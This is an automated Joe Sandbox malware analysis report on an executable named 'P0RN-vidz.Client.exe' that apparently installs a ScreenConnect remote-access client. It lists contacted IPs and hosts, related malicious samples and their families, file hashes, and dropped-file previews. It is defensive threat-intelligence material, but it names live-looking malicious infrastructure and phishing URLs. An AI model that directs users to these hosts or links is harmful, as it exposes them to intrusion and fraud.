147.75.81.6 | server-nixd2d85b70-web.screenconnect.com | Switzerland | 54825 | PACKETUS | false

IP
127.0.0.1

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579051
Start date and time: 2024-12-20 18:21:34 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: P0RN-vidz.Client.exe
Detection: MAL
Classification: mal48.evad.winEXE@18/82@5/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 72%
• Number of executed functions: 247
• Number of non-executed functions: 27
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.190.181.23, 20.231.128.66, 40.126.53.8, 20.190.181.3, 20.190.181.5, 40.126.53.10, 40.126.53.12, 40.126.53.15, 2.20.68.201, 2.20.68.210, 92.122.16.236, 192.229.221.95, 20.42.65.92, 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, cacerts.digicert.com, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
• Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7776 because it is empty
• Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7804 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: P0RN-vidz.Client.exe

Time | Type | Description
12:22:25 | API Interceptor | 751496x Sleep call for process: dfsvc.exe modified
12:22:25 | API Interceptor | 1x Sleep call for process: P0RN-vidz.Client.exe modified
12:22:25 | API Interceptor | 2x Sleep call for process: svchost.exe modified
12:22:58 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
12:23:24 | API Interceptor | 1x Sleep call for process: ScreenConnect.ClientService.exe modified

Match | Associated Sample Name / URL | Detection | Threat Name | Context
147.75.81.4 | SSA-Statement283482.exe | malicious | ScreenConnect Tool |
147.75.81.4 | SSA-Statement283482.exe | malicious | ScreenConnect Tool |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
server-nixd2d85b70-relay.screenconnect.com | SSA-Statement283482.exe | malicious | ScreenConnect Tool | 147.75.81.4
server-nixd2d85b70-relay.screenconnect.com | SSA-Statement283482.exe | malicious | ScreenConnect Tool | 147.75.81.4
fp2e7a.wpc.phicdn.net | uDTW3VjJJT.exe | malicious | LummaC, Stealc | 192.229.221.95
fp2e7a.wpc.phicdn.net | f4p4BwljZt.exe | malicious | LummaC | 192.229.221.95
fp2e7a.wpc.phicdn.net | Qmg24kMXxU.exe | malicious | LummaC, Stealc | 192.229.221.95
fp2e7a.wpc.phicdn.net | hesaphareketi-20-12-2024-pdf.exe | malicious | AgentTesla | 192.229.221.95
fp2e7a.wpc.phicdn.net | LbtytfWpvx.vbs | malicious | Remcos | 192.229.221.95
fp2e7a.wpc.phicdn.net | 17345937653b107659e23b9c28725ee4827d5eb205eece8b9a5c90afbbb742a9832aaefaab913.dat-decoded.dll | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 192.229.221.95
fp2e7a.wpc.phicdn.net | Payment_Failure_Notice_Office365_sdf_[13019].html | malicious | HTMLPhisher | 192.229.221.95
fp2e7a.wpc.phicdn.net | R4qP4YM0QX.lnk | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | download.ps1 | malicious | Unknown | 192.229.221.95

Match | Associated Sample Name / URL | Detection | Threat Name | Context
PACKETUS | la.bot.mipsel.elf | malicious | Mirai | 172.98.171.129
PACKETUS | surfex.exe | malicious | RedLine | 185.218.125.157
PACKETUS | http://1click-s.com | malicious | ScreenConnect Tool | 147.75.81.254
PACKETUS | file.exe | malicious | ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig | 147.75.80.220
PACKETUS | c2.hta | malicious | XWorm | 193.26.115.21
PACKETUS | armv5l.elf | malicious | Mirai | 23.133.3.186
PACKETUS | file.exe | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig | 147.75.84.8
PACKETUS | elitebotnet.mpsl.elf | malicious | Mirai, Okiru | 23.133.3.168
PACKETUS | loligang.x86.elf | malicious | Mirai | 185.225.234.108
                                                                                                                                                                                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        • 193.26.115.21
                                                                                                                                                                                                                                        PACKETUSla.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 172.98.171.129
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
2AIgdyA1Cl.exe | malicious | Stealc, Vidar | 147.75.81.6
Sentinelled.vbs | malicious | Unknown | 147.75.81.6
mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta | malicious | Cobalt Strike | 147.75.81.6
QUOTATION#008792.exe | malicious | AgentTesla | 147.75.81.6
Invoice DHL - AWB 2024 E4001 - 0000731.exe | malicious | Snake Keylogger | 147.75.81.6
https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment | malicious | HTMLPhisher | 147.75.81.6
file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT | 147.75.81.6
ktyihkdfesf.exe | malicious | Vidar | 147.75.81.6
https://kubota.highq.com/kubota/externalAccess.action?linkParam=248Md4JKaxiIU4vwlQaNq5FLgPVNq03doY6pcXaLJD4%3D&documentDownload=link | malicious | Unknown | 147.75.81.6
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                        Entropy (8bit):0.8307490073670308
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugA:gJjJGtpTq2yv1AuNZRY3diu8iBVqFy
                                                                                                                                                                                                                                        MD5:4B62C198AB9809F2BB6AE23120B9CD0B
                                                                                                                                                                                                                                        SHA1:04481181E0196E9BF0DFD7AF3C3D21DAADB5322A
                                                                                                                                                                                                                                        SHA-256:7AD00D65681B5BD61D422E7F1C214CA17F8E5D3ED236394493E71CCBAF9A471C
                                                                                                                                                                                                                                        SHA-512:EA3D7BDEE287EDC2CAB0477F2750DC19BC966151C72F77C56E2BA478707698352A7DD82178D0EA6F274115B6D7A0F5EBA96091E5EBFA50B7F446C7BFB53D95E3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9a7983ab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                        Entropy (8bit):0.6586036868915569
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                        MD5:0488857AD766E2A8673A49EF1A84E8CC
                                                                                                                                                                                                                                        SHA1:8D625F378C1A02E67C21ACC249199D31937D57BC
                                                                                                                                                                                                                                        SHA-256:6044A3F09797AD637571AF3A1622A6DE24946DA371FC54EBAAECAC7F18C3EEA7
                                                                                                                                                                                                                                        SHA-512:D67DD0CAD7D832E5D7AC1C4CA544F4B8F0ED76C82DE9E2332314C9C9B06F92426C65FB2CED711FBB6597742226A62456A911D4156FD875E324ED27DAB7D45509
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                        Entropy (8bit):0.08154834791836038
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:R7/lKYeLJ4kGuAJkhvekl1eJWwllrekGltll/SPj:dtKzLZrxlERJe3l
                                                                                                                                                                                                                                        MD5:889F1A4BB18A100A0CE6C4A966AA44E0
                                                                                                                                                                                                                                        SHA1:B83FED902BD9792ECDA0E43710A9120B04C074A0
                                                                                                                                                                                                                                        SHA-256:2727B0DEB2CCDBB0F6FB9D6B05FC9AC493D6F80ABBC1CC471C215590C07386D3
                                                                                                                                                                                                                                        SHA-512:F5BF0DA09D0DD0578EC5613DD8290EC6C666E12D8DF054931E7EA88A8DC833A721F4EAA4C3D8BF1277DAB4118465045B1A7FE008876675400112C67D802CB71D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):0.9185168783864288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:IipFgb/sK1ZsihmGXyf8QXIDcQvc6QcEVcw3cE/3+HbHg/Jg+OgBCXEYcI+16FJM:Ry1Zu0BU/Qjq0ozuiFJZ24IO8L
                                                                                                                                                                                                                                        MD5:1F1B148853DE8B9488B8C465EE85F163
                                                                                                                                                                                                                                        SHA1:746734432B62C48AB8A62AFE6B002E3EB490781D
                                                                                                                                                                                                                                        SHA-256:B5FC9ACCD49B44B08E3A0C996F7CC7CD9E3D2699413DFE385807806ABF969026
                                                                                                                                                                                                                                        SHA-512:58C44BC30ABE2D4690059FBE40D32EEAE00FDE4CD9274264E91C55945545288F53AE641DD4D499454AB3085A815E3EDA8986BC518558AC145EDB86FFD4BFC423
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.8.9.4.5.5.8.5.2.4.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.8.9.4.7.2.4.1.5.0.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.9.5.7.5.c.1.-.7.b.3.a.-.4.d.e.6.-.a.e.6.b.-.7.5.4.4.0.5.6.b.a.e.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.0.c.c.c.d.1.-.2.4.5.a.-.4.2.9.2.-.9.d.6.8.-.f.6.4.d.7.b.5.1.c.4.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.0.R.N.-.v.i.d.z...C.l.i.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.5.2.5.b.-.2.d.b.c.0.3.5.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.2.9.2.e.b.9.4.3.a.c.0.c.0.c.a.f.c.6.e.0.7.0.4.d.0.4.c.8.8.5.b.0.0.0.0.f.f.f.f.!.0.0.0.0.c.6.f.5.7.c.4.4.c.f.e.1.5.d.2.1.9.b.e.b.0.6.6.a.2.0.9.8.3.6.7.e.8.7.5.0.c.0.d.4.!.P.0.R.N.-.v.i.d.z...C.l.i.e.n.t...e.x.
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 17:22:25 2024, 0x1205a4 type
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):80112
                                                                                                                                                                                                                                        Entropy (8bit):1.7170666045026854
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:y9DnGhI/LyIBTgx/4N/ygeA+C80wx91R/:y9DnD6Z5g+xzr/
                                                                                                                                                                                                                                        MD5:A428B161A50E731BB4FA120555EDE07F
                                                                                                                                                                                                                                        SHA1:C7EEF92198FF5BE65A73358FD508A240DCA60CBB
                                                                                                                                                                                                                                        SHA-256:9127E8F1DAF054DF9F56E3BE0F554498435A4BCDBD49A84DEC50B694B8F54B1D
                                                                                                                                                                                                                                        SHA-512:F8947FFAF4FA2570142CACE43C09118AB9C4EA580905D3969E4A486AE08EA8E635F53940383121618D2E629FEF42A589DEAF97BC3D48231B2A5F1F9DB11A5B7A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8354
                                                                                                                                                                                                                                        Entropy (8bit):3.6980075679375655
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJPQ69DT6YEI3SU9RUxgmf8t4prV89btHsfJPm:R6lXJY69DT6YE4SU9RUxgmf8tXtMfM
                                                                                                                                                                                                                                        MD5:91F0DE8504D87E85FDBFFB890C874F05
                                                                                                                                                                                                                                        SHA1:57AAAB98A2BEDC659AEF865EBAE842E1372E01C9
                                                                                                                                                                                                                                        SHA-256:C2703A11598C5ECE8863CE94364DF5ADB090DFEEF80B978E21ADC02705AEBD09
                                                                                                                                                                                                                                        SHA-512:174A80D817F3A9E398932FCF75997ADD0538BEC44342A04D3D00B4CA31B41AC546625CF0DEDDFD9355C1AC02984677A21BA19803A501F97D5D7773CAAF1D5860
                                                                                                                                                                                                                                        Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6780</Pi
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4623
                                                                                                                                                                                                                                        Entropy (8bit):4.489471167391645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsNJg77aI9idWpW8VYZYm8M4JwVLSLFxM+q8A2gJDgPwd:uIjfnI7Ys7VdJwfpDgPwd
                                                                                                                                                                                                                                        MD5:B5BFA812CBB3C942343CA0DAD50211C3
                                                                                                                                                                                                                                        SHA1:75AEA5A7ED125D2237BC3A027D2278A3705B8136
                                                                                                                                                                                                                                        SHA-256:D6FCDA76DA7BC8A6483589CF3D8E3B297695F39A5FDA063A14FD709AFA4B7F3F
                                                                                                                                                                                                                                        SHA-512:92A67A4374CF586BBC5BF6A4718E5F8A6CB62BFD91E1DEBCB29DE1E6B1C8522246F6B705DFA8FC84AC632779E2D858915FE7172DA8E98D6E8A1A350FFA0CEDEC
                                                                                                                                                                                                                                        Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="19045" /> <arg nm="vercsdbld" val="2006" /> <arg nm="verqfe" val="2006" /> <arg nm="csdbld" val="2006" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="2057" /> <arg nm="geoid" val="223" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="639865" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.789.19041.0-11.0.1000" /> <arg nm="portos" val="0" /> <arg nm="ram" val="409
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):83964
                                                                                                                                                                                                                                        Entropy (8bit):3.0639725640132136
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:iwYBzuKGo0rJaPMMZatQ4Xd1zr67mu56rP/:iwYBzuKGo0rJaPMMZatQ4Xd1zr67mu5s
                                                                                                                                                                                                                                        MD5:D89D2F782EB3E2237257B3741732D4ED
                                                                                                                                                                                                                                        SHA1:DD0D0B545D2B19217168E69839848FAE7063BC00
                                                                                                                                                                                                                                        SHA-256:B7EBBF553C5C5635F09A4C30CC7548AA4A1F29CA43350435CEED5C7C38255C75
                                                                                                                                                                                                                                        SHA-512:F47E7CCBDE665808FAE162B55496F2EB99DC7D61A72505C99F05C2DE0A6F373490F522B481941FB0EBDB5BF71F4CA8C0A384AB081155974765659B9699827720
                                                                                                                                                                                                                                        Malicious:false
Preview:ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.684677565562834
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWtJ6ayp2FPHYRSYUWzH4YEZs/Ht8i0LXCNwD2daoVs+M9JUI2h3:2ZDtIaHzAiaaoVs+M9JD2h3
                                                                                                                                                                                                                                        MD5:034CFE3D5FF19E57C12CEFB6190F906E
                                                                                                                                                                                                                                        SHA1:5C7C3D1BE82ACD49CD149332A596C8E45A1F63BE
                                                                                                                                                                                                                                        SHA-256:7AC1C87FE01214E9CF3176C47FC2B46A1EF8AB2DA81BAF43D6461C276E40F484
                                                                                                                                                                                                                                        SHA-512:274F4CED440471FC6FEC6254B579FCD84A58905653D80593C4BC8D0384614C032124605615966E32C826C3E20EEFAB9EA858CC1BEBAFBF0B6AF444106B453537
                                                                                                                                                                                                                                        Malicious:false
Preview:B TimerResolution 156250 B PageSize 4096 B NumberOfPhysicalPages 1048333 B LowestPhysicalPageNumber 2 B HighestPhysicalPageNumber 1310719 B AllocationGranularity 65536 B MinimumUserModeAddress 65536 B MaximumUserModeAddress 140737488289791 B ActiveProcessorsAffinityMask
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4761
                                                                                                                                                                                                                                        Entropy (8bit):7.945585251880973
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                                                                                                                                                                                                                        MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                                                                                                                                                                                                                        SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                                                                                                                                                                                                                        SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                                                                                                                                                                                                                        SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                        Entropy (8bit):7.5952943825561885
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5onfZQc5RlRtBfQGQyshVBh/kZGxCBRrc9QrBI+cM7bu5rDZle7ux3cvUtlWxqhv:5iKcdZt/aBh/kMCBRIarzdCtDZQKZtl3
                                                                                                                                                                                                                                        MD5:B08918317EA257B3B5CB86118FD1E0BA
                                                                                                                                                                                                                                        SHA1:DF74C3081C3913A2F72A8AF3F85368014AB9C871
                                                                                                                                                                                                                                        SHA-256:6B64B8DE35BD5DF96151494399C40BC6CC970FF598F8771A0BC6F7151D1BD42E
                                                                                                                                                                                                                                        SHA-512:452D83747C11A0F6062F66D14C1C2051A4C7DAFA99F970E1A23D48A6A2935283D54242ED9800C9925E0C5429611EF705AF664E3206B391033C592993A519BF69
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                        Entropy (8bit):3.4453558162034477
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKk8HG7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:cMLkPlE99SCQl2DUeXJlOA
                                                                                                                                                                                                                                        MD5:F455263A2886942D69F9F4E466ABF8F3
                                                                                                                                                                                                                                        SHA1:0E6BADE7E5B7A3C028E536E758CCA015D03A8FBE
                                                                                                                                                                                                                                        SHA-256:8322109A944CA1F63B56A9806E648139CD60D6990A54C67FD9523CE4B4D89015
                                                                                                                                                                                                                                        SHA-512:702AAD1A3ED20272CAA3B1BFE6E1AEB3CC91283703104AE31493B982D47F9BECB482B9E931805382C7A69427A421588D8CECD82320ED20C268466C8E0F3F1042
                                                                                                                                                                                                                                        Malicious:false
